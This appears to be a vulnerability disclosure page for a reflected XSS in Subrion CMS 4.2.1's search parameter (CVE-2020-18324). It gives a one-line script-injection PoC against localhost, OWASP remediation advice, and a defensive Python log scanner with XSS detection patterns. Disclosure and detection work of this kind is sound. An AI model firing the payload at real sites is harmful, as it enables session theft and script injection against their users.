
CVE-2020-18324 PoC — Subrion CMS cross-site scripting vulnerability

Source
Associated Vulnerability
Title: Subrion CMS cross-site scripting vulnerability (CVE-2020-18324)
Description: Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template.
Description
Exploit PoC for CVE-2020-18324
Readme

# Subrion CMS 4.2.1 – Reflected XSS vulnerability in Kickstart template
# Description
Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

A reflected cross-site scripting vulnerability was discovered in the "Kickstart" web application template of Subrion CMS v4.2.1, in its "search" component: the `q` search parameter is reflected into the page without output encoding, which allows a remote attacker to inject arbitrary JavaScript into the response.

**Date**: 22-02-2022 \
**Software Link:** https://subrion.org \
**Exploit Author**: HaMM0nz \
**CVE**: CVE-2020-18324 \
**Category:** Web Application

# Proof of Concept
1. Navigate to the Subrion Kickstart template.
2. Inject `<script>alert(document.cookie);</script>` into the "q" parameter; the PoC request is `https://localhost/search/?q=<script>alert(document.cookie);</script>`

# Timeline
**Discovery and report** : 24 June 2019 \
**CVE ID was assigned** : 11 Aug 2021 \
**Public** : 22 February 2022
# Solution
Consider complying with OWASP's XSS prevention guidelines, in particular contextual output encoding of the reflected `q` value (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).
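As an added, defender-side example (not part of the PoC and not Subrion CMS code), the script below scans constructed access-log lines for `/search/` requests whose `q` parameter carries HTML or script markup once it is fully percent-decoded, and shows the HTML entity encoding OWASP prescribes before `q` is reflected into a page. The log lines, IP addresses and function names are assumptions constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Feb/2022:10:01:02 +0000] "GET /search/?q=laptop HTTP/1.1" 200 5123
203.0.113.9 - - [22/Feb/2022:10:01:07 +0000] "GET /search/?q=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E HTTP/1.1" 200 5201
203.0.113.9 - - [22/Feb/2022:10:01:09 +0000] "GET /search/?q=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 5198
198.51.100.2 - - [22/Feb/2022:10:02:00 +0000] "GET /blog/?page=2 HTTP/1.1" 200 8100
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markers of HTML/JS injection attempts, checked on the fully decoded value.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; double-encoded payloads would
    otherwise slip past a check on the raw query string."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_search_xss(log_text: str) -> list:
    """Return (client_ip, decoded_q) for /search/ requests whose q carries markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.rstrip("/").endswith("/search"):
            continue
        # parse_qs decodes one layer; fully_decode handles nested encoding.
        for q in parse_qs(parts.query, keep_blank_values=True).get("q", []):
            decoded = fully_decode(q)
            if MARKUP_RE.search(decoded):
                hits.append((line.split()[0], decoded))
    return hits


def safe_reflect(q: str) -> str:
    """Entity-encode q before echoing it into an HTML body (OWASP rule for HTML context)."""
    return html.escape(q, quote=True)


if __name__ == "__main__":
    for ip, payload in find_search_xss(SAMPLE_LOG):
        print(f"{ip} -> {payload!r} (safe form: {safe_reflect(payload)})")
```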
File Snapshot

[4.0K] /data/pocs/8bd4366c75beef244c22c0a21046ff439a7528c6
├── [1.0M] CVE-2020-18324.pdf
└── [1.1K] README.md

0 directories, 2 files